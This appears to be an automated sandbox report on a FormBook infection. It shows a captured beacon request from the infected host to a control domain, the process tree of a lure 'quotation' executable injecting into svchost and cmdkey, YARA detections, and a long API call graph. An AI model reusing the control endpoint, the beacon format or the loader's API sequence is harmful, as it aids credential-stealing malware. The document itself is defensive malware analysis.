                                                                          Jan 9, 2025 16:52:54.829241037 CET | 530 | OUT | GET /kj1o/?lV=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:54.954835892 CET | 783 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:52:54 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:52:54 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQmfIxJC0uUFpaSeVVGGT%2FMOoVuKBqOJ04gzqOmGvfmTnkcOWCuuh3W3x7%2FEsVMVcy7gY4NDFdenZ4INW7oQZAJASHSNWy7C8o4WT5FmCS%2Bw5%2B4QyzUaEqHgFV8hwVXxic6C"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff598df1864eb08-ORD
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>



                                                                          Target ID:0
                                                                          Start time:10:46:15
                                                                          Start date:09/01/2025
                                                                          Path:C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
                                                                          Imagebase:0x630000
                                                                          File size:1'749'504 bytes
                                                                          MD5 hash:71A9653E383348DB78EDAA7619DEA426
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:1
                                                                          Start time:10:46:16
                                                                          Start date:09/01/2025
                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
                                                                          Imagebase:0xb10000
                                                                          File size:47'016 bytes
                                                                          MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:10:47:07
                                                                          Start date:09/01/2025
                                                                          Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                          Imagebase:0x140000000
                                                                          File size:16'696'840 bytes
                                                                          MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:10:47:08
                                                                          Start date:09/01/2025
                                                                          Path:C:\Windows\SysWOW64\cmdkey.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                                          Imagebase:0xf0000
                                                                          File size:17'408 bytes
                                                                          MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:4
                                                                          Start time:10:47:33
                                                                          Start date:09/01/2025
                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                          Imagebase:0x7ff74adc0000
                                                                          File size:597'432 bytes
                                                                          MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true


                                                                            Execution Graph

                                                                            Execution Coverage:2.7%
                                                                            Dynamic/Decrypted Code Coverage:2.1%
                                                                            Signature Coverage:3.5%
                                                                            Total number of Nodes:1622
                                                                            Total number of Limit Nodes:42
631b96 RegisterWindowMessageW 96960->96961 96961->96912 96963 641981 96962->96963 96964 64195d 96962->96964 96988 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96963->96988 96971 64196e 96964->96971 96990 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96964->96990 96966 64198b 96966->96964 96989 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96966->96989 96969 648727 96969->96971 96991 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96969->96991 96971->96916 96973 631abb 96972->96973 96974 67272d 96972->96974 96975 64fddb 22 API calls 96973->96975 96992 6a3209 23 API calls 96974->96992 96978 631ac3 96975->96978 96977 672738 96978->96918 96979->96927 96980->96929 96993 6a092a 28 API calls 96980->96993 96982 63a961 22 API calls 96981->96982 96983 6313fc 96982->96983 96984 63a961 22 API calls 96983->96984 96985 631404 96984->96985 96986 63a961 22 API calls 96985->96986 96987 6313c6 96986->96987 96987->96934 96988->96966 96989->96964 96990->96969 96991->96971 96992->96977 96994 682a00 97008 63d7b0 96994->97008 96995 63db11 PeekMessageW 96995->97008 96996 63d807 GetInputState 96996->96995 96996->97008 96997 681cbe TranslateAcceleratorW 96997->97008 96999 63db73 TranslateMessage DispatchMessageW 97000 63db8f PeekMessageW 96999->97000 97000->97008 97001 63da04 timeGetTime 97001->97008 97002 63dbaf Sleep 97019 63dbc0 97002->97019 97003 682b74 Sleep 97003->97019 97004 681dda timeGetTime 97113 64e300 23 API calls 97004->97113 97005 64e551 timeGetTime 97005->97019 97008->96995 97008->96996 97008->96997 97008->96999 97008->97000 97008->97001 97008->97002 97008->97003 97008->97004 97015 63d9d5 97008->97015 97022 63ec40 207 API calls 97008->97022 97026 63dd50 97008->97026 97033 63dfd0 97008->97033 97056 641310 97008->97056 97111 63bf40 207 API calls 97008->97111 97112 64edf6 IsDialogMessageW GetClassLongW 
97008->97112 97114 6a3a2a 23 API calls 97008->97114 97115 6a359c 82 API calls 97008->97115 97009 682c0b GetExitCodeProcess 97012 682c21 WaitForSingleObject 97009->97012 97013 682c37 CloseHandle 97009->97013 97010 6c29bf GetForegroundWindow 97010->97019 97012->97008 97012->97013 97013->97019 97014 682a31 97014->97015 97016 682ca9 Sleep 97016->97008 97019->97005 97019->97008 97019->97009 97019->97010 97019->97014 97019->97015 97019->97016 97116 6b5658 23 API calls 97019->97116 97117 69e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97019->97117 97118 69d4dc 47 API calls 97019->97118 97022->97008 97027 63dd6f 97026->97027 97029 63dd83 97026->97029 97119 63d260 207 API calls 97027->97119 97120 6a359c 82 API calls 97029->97120 97030 63dd7a 97030->97008 97032 682f75 97032->97032 97034 63e010 97033->97034 97050 63e0dc 97034->97050 97123 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97034->97123 97035 63ec40 207 API calls 97035->97050 97038 682fca 97040 63a961 22 API calls 97038->97040 97038->97050 97039 63a961 22 API calls 97039->97050 97041 682fe4 97040->97041 97124 6500a3 29 API calls 97041->97124 97045 682fee 97125 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97045->97125 97049 63a8c7 22 API calls 97049->97050 97050->97035 97050->97039 97050->97049 97051 63e3e1 97050->97051 97052 6404f0 22 API calls 97050->97052 97053 6a359c 82 API calls 97050->97053 97121 63a81b 41 API calls 97050->97121 97122 64a308 207 API calls 97050->97122 97126 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97050->97126 97127 6500a3 29 API calls 97050->97127 97128 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97050->97128 97129 6b47d4 207 API calls 97050->97129 97130 6b68c1 207 API calls 97050->97130 97051->97008 97052->97050 97053->97050 97057 641376 97056->97057 97058 6417b0 
97056->97058 97059 641390 97057->97059 97060 686331 97057->97060 97283 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97058->97283 97062 641940 9 API calls 97059->97062 97242 6b709c 97060->97242 97065 6413a0 97062->97065 97064 6417ba 97067 6417fb 97064->97067 97069 639cb3 22 API calls 97064->97069 97068 641940 9 API calls 97065->97068 97066 68633d 97066->97008 97071 686346 97067->97071 97073 64182c 97067->97073 97070 6413b6 97068->97070 97076 6417d4 97069->97076 97070->97067 97072 6413ec 97070->97072 97288 6a359c 82 API calls 97071->97288 97072->97071 97096 641408 97072->97096 97285 63aceb 23 API calls 97073->97285 97284 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97076->97284 97077 641839 97286 64d217 207 API calls 97077->97286 97080 68636e 97289 6a359c 82 API calls 97080->97289 97081 64152f 97083 64153c 97081->97083 97084 6863d1 97081->97084 97086 641940 9 API calls 97083->97086 97291 6b5745 54 API calls 97084->97291 97087 641549 97086->97087 97092 641940 9 API calls 97087->97092 97102 6415c7 97087->97102 97088 64fddb 22 API calls 97088->97096 97089 641872 97287 64faeb 23 API calls 97089->97287 97090 64fe0b 22 API calls 97090->97096 97098 641563 97092->97098 97093 64171d 97093->97008 97095 63ec40 207 API calls 97095->97096 97096->97077 97096->97080 97096->97081 97096->97088 97096->97090 97096->97095 97100 6863b2 97096->97100 97096->97102 97098->97102 97104 63a8c7 22 API calls 97098->97104 97099 641940 9 API calls 97099->97102 97290 6a359c 82 API calls 97100->97290 97101 64167b 97101->97093 97282 64ce17 22 API calls 97101->97282 97102->97089 97102->97099 97102->97101 97131 6b958b 97102->97131 97134 6be204 97102->97134 97170 6a744a 97102->97170 97226 6a83da 97102->97226 97229 6af0ec 97102->97229 97238 636246 97102->97238 97292 6a359c 82 API calls 97102->97292 97104->97102 97111->97008 97112->97008 97113->97008 97114->97008 97115->97008 97116->97019 97117->97019 97118->97019 
97119->97030 97120->97032 97121->97050 97122->97050 97123->97038 97124->97045 97125->97050 97126->97050 97127->97050 97128->97050 97129->97050 97130->97050 97293 6b7f59 97131->97293 97133 6b959b 97133->97102 97135 63a961 22 API calls 97134->97135 97136 6be21b 97135->97136 97137 637510 53 API calls 97136->97137 97138 6be22a 97137->97138 97139 636270 22 API calls 97138->97139 97140 6be23d 97139->97140 97141 637510 53 API calls 97140->97141 97142 6be24a 97141->97142 97143 6be262 97142->97143 97144 6be2c7 97142->97144 97432 63b567 39 API calls 97143->97432 97145 637510 53 API calls 97144->97145 97147 6be2cc 97145->97147 97149 6be2d9 97147->97149 97150 6be314 97147->97150 97148 6be267 97148->97149 97151 6be280 97148->97151 97435 639c6e 22 API calls 97149->97435 97152 6be32c 97150->97152 97436 63b567 39 API calls 97150->97436 97433 636d25 22 API calls 97151->97433 97156 6be345 97152->97156 97437 63b567 39 API calls 97152->97437 97159 63a8c7 22 API calls 97156->97159 97157 6be28d 97160 636350 22 API calls 97157->97160 97161 6be35f 97159->97161 97163 6be29b 97160->97163 97413 6992c8 97161->97413 97434 636d25 22 API calls 97163->97434 97165 6be2b4 97166 636350 22 API calls 97165->97166 97169 6be2c2 97166->97169 97167 6be2e6 97167->97102 97438 6362b5 22 API calls 97169->97438 97171 6a7474 97170->97171 97172 6a7469 97170->97172 97176 63a961 22 API calls 97171->97176 97213 6a7554 97171->97213 97450 63b567 39 API calls 97172->97450 97174 64fddb 22 API calls 97175 6a7587 97174->97175 97177 64fe0b 22 API calls 97175->97177 97178 6a7495 97176->97178 97179 6a7598 97177->97179 97180 63a961 22 API calls 97178->97180 97181 636246 CloseHandle 97179->97181 97182 6a749e 97180->97182 97184 6a75a3 97181->97184 97183 637510 53 API calls 97182->97183 97185 6a74aa 97183->97185 97186 63a961 22 API calls 97184->97186 97451 63525f 22 API calls 97185->97451 97188 6a75ab 97186->97188 97190 636246 CloseHandle 97188->97190 97189 6a74bf 97191 636350 22 API calls 97189->97191 97192 6a75b2 97190->97192 
97195 6a74f2 97191->97195 97193 637510 53 API calls 97192->97193 97196 6a75be 97193->97196 97194 6a754a 97454 63b567 39 API calls 97194->97454 97195->97194 97452 69d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97195->97452 97198 636246 CloseHandle 97196->97198 97201 6a75c8 97198->97201 97200 6a7502 97200->97194 97202 6a7506 97200->97202 97442 635745 97201->97442 97204 639cb3 22 API calls 97202->97204 97206 6a7513 97204->97206 97453 69d2c1 26 API calls 97206->97453 97207 6a75ea 97455 6353de 27 API calls 97207->97455 97208 6a76de GetLastError 97210 6a76f7 97208->97210 97462 636216 CloseHandle 97210->97462 97213->97174 97224 6a76a4 97213->97224 97214 6a751c 97214->97194 97215 6a75f8 97456 6353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97215->97456 97217 6a7645 97218 64fddb 22 API calls 97217->97218 97220 6a7679 97218->97220 97219 6a75ff 97219->97217 97457 69ccff 97219->97457 97222 63a961 22 API calls 97220->97222 97223 6a7686 97222->97223 97223->97224 97461 69417d 22 API calls 97223->97461 97224->97102 97465 6a98e3 97226->97465 97228 6a83ea 97228->97102 97230 637510 53 API calls 97229->97230 97231 6af126 97230->97231 97528 639e90 97231->97528 97233 6af136 97234 6af15b 97233->97234 97235 63ec40 207 API calls 97233->97235 97237 6af15f 97234->97237 97556 639c6e 22 API calls 97234->97556 97235->97234 97237->97102 97239 636250 97238->97239 97240 63625f 97238->97240 97239->97102 97240->97239 97241 636264 CloseHandle 97240->97241 97241->97239 97243 6b70db 97242->97243 97244 6b70f5 97242->97244 97575 6a359c 82 API calls 97243->97575 97564 6b5689 97244->97564 97248 63ec40 206 API calls 97249 6b7164 97248->97249 97250 6b71ff 97249->97250 97254 6b71a6 97249->97254 97256 6b70ed 97249->97256 97251 6b7253 97250->97251 97252 6b7205 97250->97252 97253 637510 53 API calls 97251->97253 97251->97256 97576 6a1119 22 API calls 97252->97576 97255 6b7265 97253->97255 97260 6a0acc 22 API calls 97254->97260 97258 63aec9 22 API calls 97255->97258 97256->97066 97262 
6b7289 CharUpperBuffW 97258->97262 97259 6b7228 97577 63a673 22 API calls 97259->97577 97261 6b71de 97260->97261 97264 641310 206 API calls 97261->97264 97266 6b72a3 97262->97266 97264->97256 97265 6b7230 97578 63bf40 207 API calls 97265->97578 97267 6b72aa 97266->97267 97268 6b72f6 97266->97268 97571 6a0acc 97267->97571 97269 637510 53 API calls 97268->97269 97271 6b72fe 97269->97271 97579 64e300 23 API calls 97271->97579 97275 641310 206 API calls 97275->97256 97276 6b7308 97276->97256 97277 637510 53 API calls 97276->97277 97278 6b7323 97277->97278 97580 63a673 22 API calls 97278->97580 97280 6b7333 97581 63bf40 207 API calls 97280->97581 97282->97101 97283->97064 97284->97067 97285->97077 97286->97089 97287->97089 97288->97102 97289->97102 97290->97102 97291->97098 97292->97102 97331 637510 97293->97331 97297 6b8281 97298 6b844f 97297->97298 97303 6b828f 97297->97303 97395 6b8ee4 60 API calls 97298->97395 97301 6b845e 97302 6b846a 97301->97302 97301->97303 97318 6b7fd5 97302->97318 97367 6b7e86 97303->97367 97304 637510 53 API calls 97320 6b8049 97304->97320 97309 6b82c8 97382 64fc70 97309->97382 97312 6b82e8 97388 6a359c 82 API calls 97312->97388 97313 6b8302 97389 6363eb 22 API calls 97313->97389 97316 6b82f3 GetCurrentProcess TerminateProcess 97316->97313 97317 6b8311 97390 636a50 22 API calls 97317->97390 97318->97133 97320->97297 97320->97304 97320->97318 97386 69417d 22 API calls 97320->97386 97387 6b851d 42 API calls 97320->97387 97321 6b832a 97329 6b8352 97321->97329 97391 6404f0 22 API calls 97321->97391 97323 6b84c5 97323->97318 97327 6b84d9 FreeLibrary 97323->97327 97324 6b8341 97392 6b8b7b 75 API calls 97324->97392 97327->97318 97329->97323 97393 6404f0 22 API calls 97329->97393 97394 63aceb 23 API calls 97329->97394 97396 6b8b7b 75 API calls 97329->97396 97332 637525 97331->97332 97348 637522 97331->97348 97333 63755b 97332->97333 97334 63752d 97332->97334 97337 63756d 97333->97337 97343 6750f6 97333->97343 97345 67500f 97333->97345 97397 6551c6 26 
API calls 97334->97397 97398 64fb21 51 API calls 97337->97398 97338 67510e 97338->97338 97341 64fddb 22 API calls 97344 637547 97341->97344 97342 63753d 97342->97341 97400 655183 26 API calls 97343->97400 97346 639cb3 22 API calls 97344->97346 97347 64fe0b 22 API calls 97345->97347 97353 675088 97345->97353 97346->97348 97349 675058 97347->97349 97348->97318 97354 6b8cd3 97348->97354 97350 64fddb 22 API calls 97349->97350 97351 67507f 97350->97351 97352 639cb3 22 API calls 97351->97352 97352->97353 97399 64fb21 51 API calls 97353->97399 97355 63aec9 22 API calls 97354->97355 97356 6b8cee CharLowerBuffW 97355->97356 97401 698e54 97356->97401 97360 63a961 22 API calls 97361 6b8d2a 97360->97361 97408 636d25 22 API calls 97361->97408 97363 6b8d3e 97364 6393b2 22 API calls 97363->97364 97366 6b8d48 97364->97366 97365 6b8e5e 97365->97320 97366->97365 97409 6b851d 42 API calls 97366->97409 97368 6b7eec 97367->97368 97369 6b7ea1 97367->97369 97373 6b9096 97368->97373 97370 64fe0b 22 API calls 97369->97370 97371 6b7ec3 97370->97371 97371->97368 97372 64fddb 22 API calls 97371->97372 97372->97371 97374 6b92ab 97373->97374 97381 6b90ba 97373->97381 97374->97309 97375 63b567 39 API calls 97375->97381 97376 63b38f 39 API calls 97376->97381 97377 63b6b5 39 API calls 97377->97381 97378 637510 53 API calls 97378->97381 97379 65ea0c 21 API calls 97379->97381 97381->97374 97381->97375 97381->97376 97381->97377 97381->97378 97381->97379 97412 69efae 24 API calls 97381->97412 97383 64fc85 97382->97383 97384 64fd1d VirtualProtect 97383->97384 97385 64fceb 97383->97385 97384->97385 97385->97312 97385->97313 97386->97320 97387->97320 97388->97316 97389->97317 97390->97321 97391->97324 97392->97329 97393->97329 97394->97329 97395->97301 97396->97329 97397->97342 97398->97342 97399->97343 97400->97338 97403 698e74 97401->97403 97402 698f63 97402->97360 97402->97366 97403->97402 97405 698ea9 97403->97405 97407 698f68 97403->97407 97405->97402 97410 64ce60 41 API calls 97405->97410 
97407->97402 97411 64ce60 41 API calls 97407->97411 97408->97363 97409->97365 97410->97405 97411->97407 97412->97381 97414 63a961 22 API calls 97413->97414 97415 6992de 97414->97415 97416 636270 22 API calls 97415->97416 97417 6992f2 97416->97417 97418 698e54 41 API calls 97417->97418 97424 699314 97417->97424 97420 69930e 97418->97420 97419 698e54 41 API calls 97419->97424 97420->97424 97439 636d25 22 API calls 97420->97439 97423 636350 22 API calls 97423->97424 97424->97419 97424->97423 97425 6993b3 97424->97425 97428 699397 97424->97428 97440 636d25 22 API calls 97424->97440 97426 63a8c7 22 API calls 97425->97426 97427 6993c2 97425->97427 97426->97427 97427->97169 97441 636d25 22 API calls 97428->97441 97430 6993a7 97431 636350 22 API calls 97430->97431 97431->97425 97432->97148 97433->97157 97434->97165 97435->97167 97436->97152 97437->97156 97438->97167 97439->97424 97440->97424 97441->97430 97443 674035 97442->97443 97444 63575c CreateFileW 97442->97444 97445 63577b 97443->97445 97446 67403b CreateFileW 97443->97446 97444->97445 97445->97207 97445->97208 97446->97445 97447 674063 97446->97447 97463 6354c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97447->97463 97449 67406e 97449->97445 97450->97171 97451->97189 97452->97200 97453->97214 97454->97213 97455->97215 97456->97219 97458 69cd19 WriteFile 97457->97458 97459 69cd0e 97457->97459 97458->97217 97464 69cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97459->97464 97461->97224 97462->97224 97463->97449 97464->97458 97466 6a99e8 97465->97466 97467 6a9902 97465->97467 97523 6a9caa 39 API calls 97466->97523 97468 64fddb 22 API calls 97467->97468 97470 6a9909 97468->97470 97471 64fe0b 22 API calls 97470->97471 97472 6a991a 97471->97472 97474 636246 CloseHandle 97472->97474 97473 6a9ac5 97516 6a1e96 97473->97516 97475 6a9925 97474->97475 97480 63a961 22 API calls 97475->97480 97476 6a99ca 97476->97228 97478 6a9acc 97485 69ccff 4 API calls 97478->97485 97479 6a99a2 97479->97473 97479->97476 97481 
6a9a33 97479->97481 97482 6a992d 97480->97482 97483 637510 53 API calls 97481->97483 97484 636246 CloseHandle 97482->97484 97495 6a9a3a 97483->97495 97486 6a9934 97484->97486 97487 6a9aa8 97485->97487 97489 637510 53 API calls 97486->97489 97487->97476 97498 636246 CloseHandle 97487->97498 97488 6a9abb 97525 69cd57 30 API calls 97488->97525 97492 6a9940 97489->97492 97490 6a9a6e 97493 636270 22 API calls 97490->97493 97494 636246 CloseHandle 97492->97494 97496 6a9a7e 97493->97496 97497 6a994a 97494->97497 97495->97488 97495->97490 97499 6a9a8e 97496->97499 97502 63a8c7 22 API calls 97496->97502 97500 635745 5 API calls 97497->97500 97501 6a9b1e 97498->97501 97504 6333c6 22 API calls 97499->97504 97503 6a9959 97500->97503 97526 636216 CloseHandle 97501->97526 97502->97499 97506 6a995d 97503->97506 97507 6a99c2 97503->97507 97508 6a9a9c 97504->97508 97520 6353de 27 API calls 97506->97520 97522 636216 CloseHandle 97507->97522 97524 69cd57 30 API calls 97508->97524 97512 6a996b 97521 6353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97512->97521 97514 6a9972 97514->97479 97515 69ccff 4 API calls 97514->97515 97515->97479 97517 6a1e9f 97516->97517 97518 6a1ea4 97516->97518 97527 6a0f67 24 API calls 97517->97527 97518->97478 97520->97512 97521->97514 97522->97476 97523->97479 97524->97487 97525->97487 97526->97476 97527->97518 97529 636270 22 API calls 97528->97529 97535 639eb5 97529->97535 97530 639fd2 97531 63a4a1 22 API calls 97530->97531 97532 639fec 97531->97532 97532->97233 97535->97530 97536 63a12c 97535->97536 97537 67f7c4 97535->97537 97539 63a405 97535->97539 97540 67f699 97535->97540 97543 63a6c3 22 API calls 97535->97543 97551 63a587 22 API calls 97535->97551 97552 63aec9 22 API calls 97535->97552 97555 63a4a1 22 API calls 97535->97555 97557 634573 41 API calls 97535->97557 97559 6348c8 23 API calls 97535->97559 97560 6349bd 22 API calls 97535->97560 97561 63a673 22 API calls 97535->97561 97536->97537 97536->97539 97562 6996e2 84 API calls 
97537->97562 97539->97532 97563 6996e2 84 API calls 97539->97563 97545 64fddb 22 API calls 97540->97545 97543->97535 97544 67f7d2 97546 63a4a1 22 API calls 97544->97546 97547 67f754 97545->97547 97548 67f7e8 97546->97548 97549 64fe0b 22 API calls 97547->97549 97548->97532 97549->97536 97551->97535 97553 63a0db CharUpperBuffW 97552->97553 97558 63a673 22 API calls 97553->97558 97555->97535 97556->97237 97557->97535 97558->97535 97559->97535 97560->97535 97561->97535 97562->97544 97563->97532 97565 6b56a4 97564->97565 97570 6b56f2 97564->97570 97566 64fe0b 22 API calls 97565->97566 97567 6b56c6 97566->97567 97568 64fddb 22 API calls 97567->97568 97567->97570 97582 6a0a59 22 API calls 97567->97582 97568->97567 97570->97248 97572 6a0ada 97571->97572 97574 6a0b13 97571->97574 97573 64fddb 22 API calls 97572->97573 97572->97574 97573->97574 97574->97275 97575->97256 97576->97259 97577->97265 97578->97256 97579->97276 97580->97280 97581->97256 97582->97567 97583 683a41 97587 6a10c0 97583->97587 97585 683a4c 97586 6a10c0 53 API calls 97585->97586 97586->97585 97588 6a10fa 97587->97588 97592 6a10cd 97587->97592 97588->97585 97589 6a10fc 97599 64fa11 53 API calls 97589->97599 97590 6a1101 97593 637510 53 API calls 97590->97593 97592->97588 97592->97589 97592->97590 97596 6a10f4 97592->97596 97594 6a1108 97593->97594 97595 636350 22 API calls 97594->97595 97595->97588 97598 63b270 39 API calls 97596->97598 97598->97588 97599->97590 97600 106c48b 97603 106c100 97600->97603 97602 106c4d7 97604 1069b30 GetPEB 97603->97604 97607 106c19f 97604->97607 97606 106c1d0 CreateFileW 97606->97607 97613 106c1dd 97606->97613 97608 106c1f9 VirtualAlloc 97607->97608 97607->97613 97614 106c300 CloseHandle 97607->97614 97615 106c310 VirtualFree 97607->97615 97616 106d010 GetPEB 97607->97616 97609 106c21a ReadFile 97608->97609 97608->97613 97612 106c238 VirtualAlloc 97609->97612 97609->97613 97610 106c3ec VirtualFree 97611 106c3fa 97610->97611 97611->97602 97612->97607 97612->97613 97613->97610 
97613->97611 97614->97607 97615->97607 97617 106d03a 97616->97617 97617->97606 97618 631cad SystemParametersInfoW 97619 631033 97624 634c91 97619->97624 97623 631042 97625 63a961 22 API calls 97624->97625 97626 634cff 97625->97626 97633 633af0 97626->97633 97628 673cb6 97630 634d9c 97630->97628 97631 631038 97630->97631 97636 6351f7 22 API calls 97630->97636 97632 6500a3 29 API calls 97631->97632 97632->97623 97637 633b1c 97633->97637 97636->97630 97638 633b0f 97637->97638 97639 633b29 97637->97639 97638->97630 97639->97638 97640 633b30 RegOpenKeyExW 97639->97640 97640->97638 97641 633b4a RegQueryValueExW 97640->97641 97642 633b80 RegCloseKey 97641->97642 97643 633b6b 97641->97643 97642->97638 97643->97642 97644 632e37 97645 63a961 22 API calls 97644->97645 97646 632e4d 97645->97646 97723 634ae3 97646->97723 97648 632e6b 97649 633a5a 24 API calls 97648->97649 97650 632e7f 97649->97650 97651 639cb3 22 API calls 97650->97651 97652 632e8c 97651->97652 97653 634ecb 94 API calls 97652->97653 97654 632ea5 97653->97654 97655 672cb0 97654->97655 97656 632ead 97654->97656 97657 6a2cf9 80 API calls 97655->97657 97659 63a8c7 22 API calls 97656->97659 97658 672cc3 97657->97658 97660 672ccf 97658->97660 97662 634f39 68 API calls 97658->97662 97661 632ec3 97659->97661 97664 634f39 68 API calls 97660->97664 97737 636f88 22 API calls 97661->97737 97662->97660 97666 672ce5 97664->97666 97665 632ecf 97667 639cb3 22 API calls 97665->97667 97753 633084 22 API calls 97666->97753 97668 632edc 97667->97668 97738 63a81b 41 API calls 97668->97738 97671 632eec 97673 639cb3 22 API calls 97671->97673 97672 672d02 97754 633084 22 API calls 97672->97754 97675 632f12 97673->97675 97739 63a81b 41 API calls 97675->97739 97676 672d1e 97678 633a5a 24 API calls 97676->97678 97680 672d44 97678->97680 97679 632f21 97683 63a961 22 API calls 97679->97683 97755 633084 22 API calls 97680->97755 97682 672d50 97684 63a8c7 22 API calls 97682->97684 97685 632f3f 97683->97685 97686 672d5e 97684->97686 97740 
633084 22 API calls 97685->97740 97756 633084 22 API calls 97686->97756 97689 632f4b 97741 654a28 40 API calls 97689->97741 97690 672d6d 97694 63a8c7 22 API calls 97690->97694 97692 632f59 97692->97666 97693 632f63 97692->97693 97742 654a28 40 API calls 97693->97742 97696 672d83 97694->97696 97757 633084 22 API calls 97696->97757 97697 632f6e 97697->97672 97699 632f78 97697->97699 97743 654a28 40 API calls 97699->97743 97700 672d90 97702 632f83 97702->97676 97703 632f8d 97702->97703 97744 654a28 40 API calls 97703->97744 97705 632f98 97706 632fdc 97705->97706 97745 633084 22 API calls 97705->97745 97706->97690 97707 632fe8 97706->97707 97707->97700 97747 6363eb 22 API calls 97707->97747 97709 632fbf 97712 63a8c7 22 API calls 97709->97712 97711 632ff8 97748 636a50 22 API calls 97711->97748 97714 632fcd 97712->97714 97746 633084 22 API calls 97714->97746 97715 633006 97749 6370b0 23 API calls 97715->97749 97718 633021 97721 633065 97718->97721 97750 636f88 22 API calls 97718->97750 97751 6370b0 23 API calls 97718->97751 97752 633084 22 API calls 97718->97752 97724 634af0 97723->97724 97725 636b57 22 API calls 97724->97725 97726 634b22 97724->97726 97725->97726 97736 634b58 97726->97736 97758 634c6d 97726->97758 97728 639cb3 22 API calls 97730 634c52 97728->97730 97729 639cb3 22 API calls 97729->97736 97731 63515f 22 API calls 97730->97731 97734 634c5e 97731->97734 97732 634c6d 22 API calls 97732->97736 97733 63515f 22 API calls 97733->97736 97734->97648 97735 634c29 97735->97728 97735->97734 97736->97729 97736->97732 97736->97733 97736->97735 97737->97665 97738->97671 97739->97679 97740->97689 97741->97692 97742->97697 97743->97702 